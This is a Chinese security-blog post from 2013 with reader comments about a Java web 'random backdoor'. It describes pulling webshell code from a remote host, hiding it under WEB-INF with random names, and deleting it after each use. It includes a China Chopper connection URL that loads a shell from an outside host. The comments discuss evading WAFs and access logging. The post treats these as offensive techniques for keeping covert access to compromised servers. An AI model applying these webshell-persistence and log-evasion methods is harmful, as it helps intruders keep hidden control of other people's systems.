JavaWeb随机后门?

  • A+
所属分类:lcx

我的思路是先从远程读取要生成的shell内容,然后把shell藏在WEB-INF下shell的名字和长度也都随机生成。比如:

JavaWeb随机后门?

不过就算藏在WEB-INF下也会被发现,干脆用一次就删一次?这样不会在任何目录下留下Shell。

JavaWeb随机后门?

菜刀链接:http://localhost/Demo2/new.jsp?url=http://xsser.me/caidao/css.jsp


测试的时候还发现了一个jspx和jsp的一个小秘密:

jspx的语法可以直接适用于jsp,也就是说可以把http://xsser.me/caidao/jspx.jspx的内容copy,然后保存到一个jsp文件里面一样可以正常访问。

现在要做的就是怎么去藏生成后门的代码了。

[原文地址]

相关吐槽:

1#

yexin | 2013-10-27 14:24

前排留名。

2#

淡漠天空 (路人的世界) | 2013-10-27 14:30

用jspx的语法可以直接适用于jsp,也就是说可以把http://xsser.me/caidao/jspx.jspx的内容copy,然后保存到一个jsp文件里面一样可以正常访问。

这个的确 。。。。。也是不久前发现的

3#

核心白帽子 (发标题党的草泥马) | 2013-10-27 14:36

还不如放一个jsp的一句话上去每次要用的时候上传一个jsp大马 用完了之后将jsp大马删除..

跟你这也没多大区别..看不出这样有什么方便隐藏的优势

4#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-10-27 15:31

@核心白帽子 其实也没什么大的不同,只是记录一下。一点小区别,第一这个后门存在WEB-INF直接请求http://xxx.com/WEB-INF/xxx.jsp请求不到,某些WAF可能不会检查WEB-INF下的jsp。第二accesslog记录。

5#

Coody (&_&) | 2013-10-27 15:56

@园长 accesslog不记录 WEB-INF/ 下的文件访问么?

6#

龙臣 (据说共产党员的老婆更漂亮。) | 2013-10-27 16:02

传错了 忽略之

7#

淡漠天空 (路人的世界) | 2013-10-27 16:18

@园长 国内还好 国外的WEB-INF根本无权限 某些限定环境下是行不通的

8#

淡漠天空 (路人的世界) | 2013-10-27 16:19

WAF的规则决定能不能访问或者动WEB-INF 太局限了。。。

9#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-10-27 17:03

@Coody 请求shell会accesslog会记录下来的完整shell路径请求上面的后门记录的应该是参数。

测试了下Tomcat的Accesslog没有记录getRequestDispatcher forward的地址和参数:

0:0:0:0:0:0:0:1 - - [27/Oct/2013:17:01:42 +0800] "POST /Demo2/new.jsp?url=http://xsser.me/caidao/css.jsp HTTP/1.1" 200 296

10#

wefgod (求大牛指点) | 2013-10-28 08:54

园长之前不是说filter可以?那个好像比较好

文章来源于lcx.cc:JavaWeb随机后门?

相关推荐: 工信部互联网将 [不允许拦截弹出式] 广告

    中广网北京2月3日消息(记者张棉棉)据中国之声《央广新闻》报道,工信部1月14日公布了《互联网信息服务市场秩序监督管理暂行办法(征求意见稿)》,向社会各界征求意见。反馈意见截止日期是2月14日。条例中,有一条非常引人关注,涉及内容为弹出式广告规范。  …

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: